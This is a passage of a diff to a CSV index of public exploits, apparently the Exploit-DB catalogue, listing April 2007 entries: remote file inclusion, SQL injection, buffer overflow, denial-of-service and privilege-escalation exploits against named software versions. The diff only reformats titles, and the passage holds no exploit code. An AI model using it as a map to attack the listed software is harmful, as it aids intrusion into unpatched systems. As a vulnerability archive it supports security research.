Exploit",2007-04-04,bd0rk,php,webapps,0 +3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Include Exploit",2007-04-04,bd0rk,php,webapps,0 3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit",2007-04-04,ri0t,windows,remote,0 3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets <= 1.02 (c) - BLIND SQL Injection Exploit",2007-04-04,ajann,php,webapps,0 3664,platforms/windows/local/3664.txt,"TrueCrypt 4.3 - Privilege Escalation Exploit",2007-04-04,"Marco Ivaldi",windows,local,0 3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 mutant_functions.php Remote File Inclusion Exploit",2007-04-04,bd0rk,php,webapps,0 -3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 (visit.php) SQL Injection Exploit",2007-04-04,ajann,php,webapps,0 -3667,platforms/php/webapps/3667.txt,"Sisplet CMS <= 05.10 (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 +3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - (visit.php) SQL Injection Exploit",2007-04-04,ajann,php,webapps,0 +3667,platforms/php/webapps/3667.txt,"Sisplet CMS <= 05.10 - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0 -3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 +3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 - (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0 -3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 +3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 - (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure",2007-04-05,Trex,php,webapps,0 -3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0 -3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)",2007-04-06,"Umesh Wanve",windows,remote,21 -3676,platforms/php/webapps/3676.txt,"Beryo 2.0 (downloadpic.php chemin) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 -3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 (download2.php fn1) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 -3678,platforms/php/webapps/3678.php,"SmodBIP <= 1.06 (aktualnosci zoom) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 -3679,platforms/php/webapps/3679.php,"SmodCMS <= 2.10 (Slownik ssid) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 +3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0 +3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server <= 1.01 - (LIST) Remote Buffer Overflow Exploit (2)",2007-04-06,"Umesh Wanve",windows,remote,21 +3676,platforms/php/webapps/3676.txt,"Beryo 2.0 - (downloadpic.php chemin) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 +3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 - (download2.php fn1) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 +3678,platforms/php/webapps/3678.php,"SmodBIP <= 1.06 - (aktualnosci zoom) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 +3679,platforms/php/webapps/3679.php,"SmodCMS <= 2.10 - (Slownik ssid) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite - Off-by-one Remote Overflow Exploit (Win32)",2007-04-07,axis,windows,remote,80 -3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 (smilies.php config) Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 +3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 - (smilies.php config) Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] LFI Exploit",2007-04-08,bd0rk,php,webapps,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Exploit",2007-04-08,Marsu,windows,dos,0 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software - RFI",2007-04-08,the_Edit0r,php,webapps,0 -3686,platforms/php/webapps/3686.txt,"WitShare 0.9 (index.php menu) Local File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 -3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0 +3686,platforms/php/webapps/3686.txt,"WitShare 0.9 - (index.php menu) Local File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 +3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 - (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0 3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0 -3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0 +3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 - (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0 3690,platforms/windows/dos/3690.txt,"Microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps,0 3692,platforms/windows/local/3692.c,"IrfanView 3.99 - (.ani) Local Buffer Overflow Exploit",2007-04-09,"Breno Silva Pinto",windows,local,0 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - (.hlp) Local HEAP Overflow PoC (0Day)",2007-04-09,muts,windows,dos,0 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,php,webapps,0 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor (.ANI) Local Overflow Exploit",2007-04-09,"Breno Silva Pinto",windows,local,0 -3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 (warn.php file) Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 +3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 - (warn.php file) Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 3697,platforms/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution",2007-04-10,Dj7xpl,php,webapps,0 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 3699,platforms/php/webapps/3699.txt,"phpGalleryScript 1.0 - (init.gallery.php include_class) RFI",2007-04-10,anonymous,php,webapps,0 @@ -3361,74 +3361,74 @@ id,file,description,date,author,platform,type,port 3702,platforms/php/webapps/3702.php,"InoutMailingListManager <= 3.1 - Remote Command Execution Exploit",2007-04-10,BlackHawk,php,webapps,0 3703,platforms/php/webapps/3703.txt,"Joomla/Mambo Component Taskhopper 1.1 - RFI Vulnerabilities",2007-04-10,"Cold Zero",php,webapps,0 3704,platforms/php/webapps/3704.txt,"pl-php beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 -3705,platforms/php/webapps/3705.txt,"SimpCMS <= 04.10.2007 (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 +3705,platforms/php/webapps/3705.txt,"SimpCMS <= 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery <= 2.5 Beta 2 - RFI Vulnerabilities",2007-04-11,iskorpitx,php,webapps,0 3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulnerabilities",2007-04-11,"Cold Zero",php,webapps,0 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Transversal Exploit",2007-04-11,shinnai,multiple,remote,0 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 non-existent applet Denial of Service Exploit",2007-04-11,shinnai,multiple,dos,0 3710,platforms/php/webapps/3710.php,"PunBB <= 1.2.14 - Remote Code Execution Exploit",2007-04-11,DarkFig,php,webapps,0 -3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 (codebreak.php) Remote File Inclusion Exploit",2007-04-11,"John Martinelli",php,webapps,0 +3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 - (codebreak.php) Remote File Inclusion Exploit",2007-04-11,"John Martinelli",php,webapps,0 3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - (absolute_path) RFI",2007-04-11,"Cold Zero",php,webapps,0 3713,platforms/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 - RFI",2007-04-11,"Cold Zero",php,webapps,0 3714,platforms/php/webapps/3714.txt,"joomla component mosmedia <= 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,php,webapps,0 3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 POST Request Denial of Service Exploit",2007-04-12,shinnai,windows,dos,0 3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - (getinfo1.php) RFI Exploit",2007-04-12,bd0rk,php,webapps,0 -3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 (absolute_path) Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0 -3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 (header.php lang) Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 -3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) <= 1.2.2 (CLIENT-IP) SQL Injection Exploit",2007-04-12,Elekt,php,webapps,0 -3721,platforms/php/webapps/3721.pl,"e107 0.7.8 (mailout.php) Access Escalation Exploit (admin needed)",2007-04-12,Gammarays,php,webapps,0 -3722,platforms/php/webapps/3722.txt,"Expow 0.8 (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0 +3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 - (absolute_path) Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0 +3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - (header.php lang) Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 +3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) <= 1.2.2 - (CLIENT-IP) SQL Injection Exploit",2007-04-12,Elekt,php,webapps,0 +3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - (mailout.php) Access Escalation Exploit (admin needed)",2007-04-12,Gammarays,php,webapps,0 +3722,platforms/php/webapps/3722.txt,"Expow 0.8 - (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0 3723,platforms/php/webapps/3723.txt,"Request It 1.0b (index.php id) Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 3724,platforms/linux/remote/3724.c,"Aircrack-ng 0.7 - (Specially Crafted 802.11 Packets) Remote BoF Exploit",2007-04-12,"Jonathan So",linux,remote,0 -3725,platforms/php/webapps/3725.php,"Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0 +3725,platforms/php/webapps/3725.php,"Chatness <= 2.5.3 - (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service Exploit",2007-04-13,evilrabbi,multiple,dos,0 -3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 +3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 - (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0 3729,platforms/php/webapps/3729.txt,"qdblog 0.4 - (SQL Injection/LFI) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 3731,platforms/php/webapps/3731.php,"Frogss CMS <= 0.7 - Remote SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0 -3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 (repertoire_config) Remote File Inclusion Vulnerabilities",2007-04-13,GoLd_M,php,webapps,0 +3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion Vulnerabilities",2007-04-13,GoLd_M,php,webapps,0 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Include",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"joomla module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"mambo/joomla component article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow Exploit",2007-04-15,"Winny Thomas",windows,remote,139 3738,platforms/windows/remote/3738.php,"XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit",2007-04-15,rgod,windows,remote,80 -3739,platforms/php/webapps/3739.php,"Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit",2007-04-15,Kacper,php,webapps,0 +3739,platforms/php/webapps/3739.php,"Papoo <= 3.02 - (kontakt menuid) Remote SQL Injection Exploit",2007-04-15,Kacper,php,webapps,0 3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow Exploit",2007-04-15,devcode,windows,remote,139 -3741,platforms/php/webapps/3741.txt,"CNStats 2.9 (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0 -3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit",2007-04-15,BeyazKurt,php,webapps,0 +3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0 +3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion Exploit",2007-04-15,BeyazKurt,php,webapps,0 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - (GALLERY_BASEDIR) Multiple RFI Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 -3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 -3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 (path) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 +3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 +3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - (path) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 3746,platforms/windows/remote/3746.txt,"Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (2)",2007-04-18,"Andres Tarasco",windows,remote,445 -3747,platforms/php/webapps/3747.txt,"openMairie 1.10 (scr/soustab.php) Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 +3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - (scr/soustab.php) Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart <= 3.5 - (abs_path) RFI Vulnerabilities",2007-04-16,irvian,php,webapps,0 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) RFI Vulnerabilities",2007-04-16,"Alkomandoz Hacker",php,webapps,0 3750,platforms/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,php,webapps,0 -3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 (index.php ads_file) Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 +3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - (index.php ads_file) Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 3752,platforms/php/webapps/3752.txt,"AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities",2007-04-17,"Alkomandoz Hacker",php,webapps,0 3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE - (CAltInstaller.php) RFI",2007-04-17,"Cold Zero",php,webapps,0 -3754,platforms/php/webapps/3754.pl,"MiniGal b13 (image backdoor) Remote Code Execution Exploit",2007-04-17,Dj7xpl,php,webapps,0 +3754,platforms/php/webapps/3754.pl,"MiniGal b13 - (image backdoor) Remote Code Execution Exploit",2007-04-17,Dj7xpl,php,webapps,0 3755,platforms/windows/local/3755.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String Exploit",2007-04-17,jamikazu,windows,local,0 -3758,platforms/php/webapps/3758.php,"ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit",2007-04-17,Gammarays,php,webapps,0 -3759,platforms/php/webapps/3759.pl,"Joomla Template Be2004-2 (index.php) Remote File Include Exploit",2007-04-17,"Cold Zero",php,webapps,0 -3760,platforms/php/webapps/3760.txt,"jGallery 1.3 (index.php) Remote File Inclusion",2007-04-18,Dj7xpl,php,webapps,0 +3758,platforms/php/webapps/3758.php,"ShoutPro <= 1.5.2 - (shout.php) Remote Code Injection Exploit",2007-04-17,Gammarays,php,webapps,0 +3759,platforms/php/webapps/3759.pl,"Joomla Template Be2004-2 - (index.php) Remote File Include Exploit",2007-04-17,"Cold Zero",php,webapps,0 +3760,platforms/php/webapps/3760.txt,"jGallery 1.3 - (index.php) Remote File Inclusion",2007-04-18,Dj7xpl,php,webapps,0 3761,platforms/php/webapps/3761.txt,"Mozzers SubSystem final (subs.php) Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 -3762,platforms/php/webapps/3762.htm,"AimStats 3.2 (process.php update) Remote Code Execution Exploit",2007-04-18,Dj7xpl,php,webapps,0 -3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 (root) Remote File Inclusion Vulnerabilities",2007-04-18,GoLd_M,php,webapps,0 +3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - (process.php update) Remote Code Execution Exploit",2007-04-18,Dj7xpl,php,webapps,0 +3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 - (root) Remote File Inclusion Vulnerabilities",2007-04-18,GoLd_M,php,webapps,0 3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 - (force_download.php file) Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps,0 3765,platforms/php/webapps/3765.txt,"opensurveypilot <= 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps,0 -3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 (error.asp id) Remote SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 +3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - (error.asp id) Remote SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 - (WMV File) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0 3769,platforms/linux/dos/3769.c,"eXtremail <= 2.1.1 DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0 -3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 (PDF) Remote Denial of Service Exploit",2007-04-20,n00b,windows,dos,0 +3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 - (PDF) Remote Denial of Service Exploit",2007-04-20,n00b,windows,dos,0 3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion Vulnerabilities",2007-04-21,GoLd_M,php,webapps,0 3772,platforms/windows/local/3772.c,"Photofiltre Studio 8.1.1 - (.TIF) Local Buffer Overflow Exploit",2007-04-21,Marsu,windows,local,0 -3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 +3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 - (imgsrv.php ac) Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 3774,platforms/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - Remote SQL Injection",2007-04-22,Dj7xpl,php,webapps,0 3775,platforms/php/webapps/3775.txt,"Maran PHP Forum (forum_write.php) Remote Code Execution",2007-04-22,Dj7xpl,php,webapps,0 3776,platforms/windows/local/3776.c,"ACDSee 9.0 - (.XPM) Local Buffer Overflow Exploit",2007-04-22,Marsu,windows,local,0 @@ -3439,73 +3439,73 @@ id,file,description,date,author,platform,type,port 3781,platforms/php/webapps/3781.txt,"Joomla 1.5.0 Beta (pcltar.php) Remote File Inclusion",2007-04-23,Omid,php,webapps,0 3782,platforms/windows/dos/3782.pl,"Winamp <= 5.33 - (.AVI) Remote Denial of Service Exploit",2007-04-23,DeltahackingTEAM,windows,dos,0 3783,platforms/php/webapps/3783.txt,"Pagode 0.5.8 - (navigator_ok.php asolute) Remote File Disclosure",2007-04-23,GoLd_M,php,webapps,0 -3784,platforms/multiple/dos/3784.c,"Opera 9.2 (torrent File) Remote Denial of Service Exploit",2007-04-23,n00b,multiple,dos,0 -3785,platforms/php/webapps/3785.txt,"Post Revolution <= 0.7.0 RC 2 (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 +3784,platforms/multiple/dos/3784.c,"Opera 9.2 - (torrent File) Remote Denial of Service Exploit",2007-04-23,n00b,multiple,dos,0 +3785,platforms/php/webapps/3785.txt,"Post Revolution <= 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities",2007-04-24,"ThE TiGeR",php,webapps,0 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 3788,platforms/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 3789,platforms/windows/dos/3789.html,"Second Sight Software - ActiveMod.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 3790,platforms/windows/dos/3790.html,"NetSprint Toolbar ActiveX toolbar.dll Denial of Service PoC",2007-04-24,"Umesh Wanve",windows,dos,0 3791,platforms/hardware/dos/3791.pl,"Linksys SPA941 \377 character Remote Denial of Service Exploit",2007-04-24,MADYNES,hardware,dos,0 -3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 (remote reboot) Remote Denial of Service Exploit",2007-04-24,MADYNES,hardware,dos,0 -3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 / CS3 Unspecified .BMP File Buffer Overflow Exploit",2007-04-24,Marsu,windows,local,0 -3794,platforms/php/webapps/3794.txt,"USP FOSS Distribution 1.01 (dnld) Remote File Disclosure",2007-04-24,GoLd_M,php,webapps,0 +3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 - (remote reboot) Remote Denial of Service Exploit",2007-04-24,MADYNES,hardware,dos,0 +3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 - / CS3 Unspecified .BMP File Buffer Overflow Exploit",2007-04-24,Marsu,windows,local,0 +3794,platforms/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - (dnld) Remote File Disclosure",2007-04-24,GoLd_M,php,webapps,0 3795,platforms/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) - cart2.php RFI",2007-04-24,DamaR,php,webapps,0 -3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 (loading.php path_include) Remote File Inclusion Exploit",2007-04-24,kezzap66345,php,webapps,0 +3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - (loading.php path_include) Remote File Inclusion Exploit",2007-04-24,kezzap66345,php,webapps,0 3797,platforms/windows/local/3797.c,"ABC-View Manager 1.42 - (.PSP) Buffer Overflow Exploit",2007-04-25,Marsu,windows,local,0 3798,platforms/windows/local/3798.c,"FreshView 7.15 - (.PSP) Buffer Overflow Exploit",2007-04-25,Marsu,windows,local,0 -3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 (file.php file) Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0 -3800,platforms/php/webapps/3800.txt,"Ext 1.0 (feed-proxy.php feed) Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0 +3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 - (file.php file) Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0 +3800,platforms/php/webapps/3800.txt,"Ext 1.0 - (feed-proxy.php feed) Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0 3801,platforms/windows/local/3801.c,"Gimp 2.2.14 - (.ras) SUNRAS Plugin Buffer Overflow Exploit",2007-04-26,Marsu,windows,local,0 -3802,platforms/php/webapps/3802.txt,"phpBandManager 0.8 (index.php pg) Remote File Inclusion",2007-04-26,koray,php,webapps,0 +3802,platforms/php/webapps/3802.txt,"phpBandManager 0.8 - (index.php pg) Remote File Inclusion",2007-04-26,koray,php,webapps,0 3803,platforms/php/webapps/3803.txt,"phpOracleView - (include_all.inc.php page_dir) RFI",2007-04-26,"Alkomandoz Hacker",php,webapps,0 3804,platforms/windows/remote/3804.txt,"Microsoft Windows - (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0 -3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 (doc_root) Remote File Inclusion Vulnerabilities",2007-04-26,"Alkomandoz Hacker",php,webapps,0 -3806,platforms/php/webapps/3806.txt,"EsForum 3.0 (forum.php idsalon) Remote SQL Injection",2007-04-26,"ilker Kandemir",php,webapps,0 +3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 - (doc_root) Remote File Inclusion Vulnerabilities",2007-04-26,"Alkomandoz Hacker",php,webapps,0 +3806,platforms/php/webapps/3806.txt,"EsForum 3.0 - (forum.php idsalon) Remote SQL Injection",2007-04-26,"ilker Kandemir",php,webapps,0 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow PoC",2007-04-27,mu-b,linux,dos,0 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit (2)",2007-04-27,shinnai,windows,remote,0 -3809,platforms/php/webapps/3809.txt,"burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities",2007-04-27,GoLd_M,php,webapps,0 +3809,platforms/php/webapps/3809.txt,"burnCMS <= 0.2 - (root) Remote File Inclusion Vulnerabilities",2007-04-27,GoLd_M,php,webapps,0 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX (iPIX-ImageWell-ipix.dll) BoF Exploit",2007-04-27,"Umesh Wanve",windows,remote,0 3811,platforms/windows/local/3811.c,"IrfanView <= 4.00 - (.iff) Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - (.png) BoF Exploit",2007-04-27,Marsu,windows,local,0 3813,platforms/php/webapps/3813.txt,"PostNuke 